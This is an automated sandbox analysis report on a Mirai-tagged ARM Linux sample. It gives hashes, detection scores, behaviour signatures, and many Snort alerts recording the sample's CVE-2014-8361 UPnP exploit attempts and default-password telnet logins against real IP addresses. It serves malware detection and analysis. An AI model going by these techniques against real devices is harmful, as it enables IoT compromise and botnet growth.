Linux Analysis Report Hilix.arm

Overview

General Information

Sample Name:	Hilix.arm
Analysis ID:	513293
MD5:	9653f94dca32a23046c21ffeea172dd6
SHA1:	a7037a2353ddf06c10144563b077c906b92ebbfa
SHA256:	dcd35159cd640f9b66aad91d5dc7d1e81fffd2478c1e44e0f3184db70285040f
Tags:	Mirai
Infos:
Most interesting Screenshot:

Detection

Mirai

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Mirai

Multi AV Scanner detection for submitted file

Uses known network protocols on non-standard ports

Sample tries to kill many processes (SIGKILL)

Connects to many ports of the same IP (likely port scanning)

Sample has stripped symbol table

HTTP GET or POST without a user agent

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Detected TCP or UDP traffic on non-standard ports

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: Hilix.arm	Virustotal: Detection: 53%			Perma Link
Source: Hilix.arm	ReversingLabs: Detection: 63%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42190 -> 91.78.98.43:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42190 -> 91.78.98.43:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42192 -> 91.78.98.43:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42938 -> 91.76.246.155:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42938 -> 91.76.246.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42940 -> 91.76.246.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52534 -> 45.195.65.222:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52534 -> 45.195.65.222:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41374 -> 45.115.242.71:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41374 -> 45.115.242.71:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37956 -> 45.120.78.8:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37956 -> 45.120.78.8:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37998 -> 45.33.253.20:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37998 -> 45.33.253.20:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41988 -> 185.54.231.60:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41988 -> 185.54.231.60:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42370 -> 91.77.144.168:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42370 -> 91.77.144.168:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42376 -> 91.77.144.168:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43734 -> 45.126.231.52:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43734 -> 45.126.231.52:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42000 -> 185.54.231.60:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53188 -> 45.115.241.90:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42808 -> 45.120.204.46:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42808 -> 45.120.204.46:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49774 -> 45.126.231.173:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49774 -> 45.126.231.173:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38276 -> 45.195.11.155:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38276 -> 45.195.11.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41826 -> 45.42.86.119:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41826 -> 45.42.86.119:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:35304
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:35304
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46844 -> 45.195.8.141:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46844 -> 45.195.8.141:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43118
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:57880
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:57880
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43118
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43118
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:32954 -> 64.85.48.118:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:32954
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:32954
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59500 -> 185.241.254.96:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59500 -> 185.241.254.96:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59502 -> 185.241.254.96:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52730
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43150
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49498 -> 45.33.251.25:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49498 -> 45.33.251.25:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43150
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43150
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:57454
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:57454
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60606 -> 185.71.64.118:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60606 -> 185.71.64.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60624 -> 185.71.64.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50314 -> 185.216.251.57:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50314 -> 185.216.251.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50318 -> 185.216.251.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44216 -> 91.78.59.110:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44216 -> 91.78.59.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44220 -> 91.78.59.110:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48390 -> 185.182.49.106:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48390 -> 185.182.49.106:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51856 -> 45.33.249.12:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51856 -> 45.33.249.12:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52826
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43252
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35174 -> 91.202.189.67:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35174 -> 91.202.189.67:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35180 -> 91.202.189.67:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43252
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43252
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37322 -> 185.54.229.57:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37322 -> 185.54.229.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37324 -> 185.54.229.57:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42786 -> 45.120.111.162:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42786 -> 45.120.111.162:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42792 -> 45.120.111.162:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43298
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52880
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53568 -> 91.78.174.222:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53568 -> 91.78.174.222:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53570 -> 91.78.174.222:52869
Source: Traffic	Snort IDS: 2023333 ET TROJAN Linux.Mirai Login Attempt (xc3511) 192.168.2.23:53340 -> 80.229.103.151:23
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:53340 -> 80.229.103.151:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43298
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43298
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60964 -> 45.115.237.198:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60964 -> 45.115.237.198:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:35526
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:35526
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49632 -> 45.113.3.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49632 -> 45.113.3.178:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58144
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58144
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43406
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:52998
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46480 -> 91.77.105.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46480 -> 91.77.105.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34652 -> 185.241.252.215:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34652 -> 185.241.252.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46486 -> 91.77.105.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34656 -> 185.241.252.215:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41238 -> 185.242.234.62:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41238 -> 185.242.234.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41248 -> 185.242.234.62:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37898 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37898 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37900 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43406
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43406
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33250
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33250
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50282 -> 91.77.227.169:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50282 -> 91.77.227.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50288 -> 91.77.227.169:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36600 -> 45.117.146.14:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36600 -> 45.117.146.14:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37908 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37908 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37916 -> 45.177.209.66:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53780 -> 45.43.224.238:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53780 -> 45.43.224.238:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56812 -> 45.43.232.3:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56812 -> 45.43.232.3:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53460 -> 185.207.92.145:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53460 -> 185.207.92.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53464 -> 185.207.92.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36894 -> 45.91.226.68:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36894 -> 45.91.226.68:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:57742
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:57742
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43488
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53074
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52752 -> 91.79.25.86:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52752 -> 91.79.25.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52754 -> 91.79.25.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48052 -> 45.133.119.206:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48052 -> 45.133.119.206:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40946 -> 45.41.89.70:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40946 -> 45.41.89.70:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43488
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43488
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59546 -> 91.220.244.208:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59546 -> 91.220.244.208:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59550 -> 91.220.244.208:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53796 -> 45.43.235.171:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53796 -> 45.43.235.171:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59826 -> 45.195.158.235:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59826 -> 45.195.158.235:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57990 -> 91.134.128.61:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57990 -> 91.134.128.61:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57992 -> 91.134.128.61:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42006 -> 91.76.168.63:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42006 -> 91.76.168.63:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42010 -> 91.76.168.63:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43554
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53144
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51422 -> 45.120.206.159:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51422 -> 45.120.206.159:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49978 -> 45.127.162.102:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49978 -> 45.127.162.102:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45072 -> 45.207.63.40:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45072 -> 45.207.63.40:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41756 -> 45.195.10.90:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41756 -> 45.195.10.90:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41760 -> 45.195.10.90:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43554
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43554
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:47610
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35666 -> 45.126.231.87:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35666 -> 45.126.231.87:52869
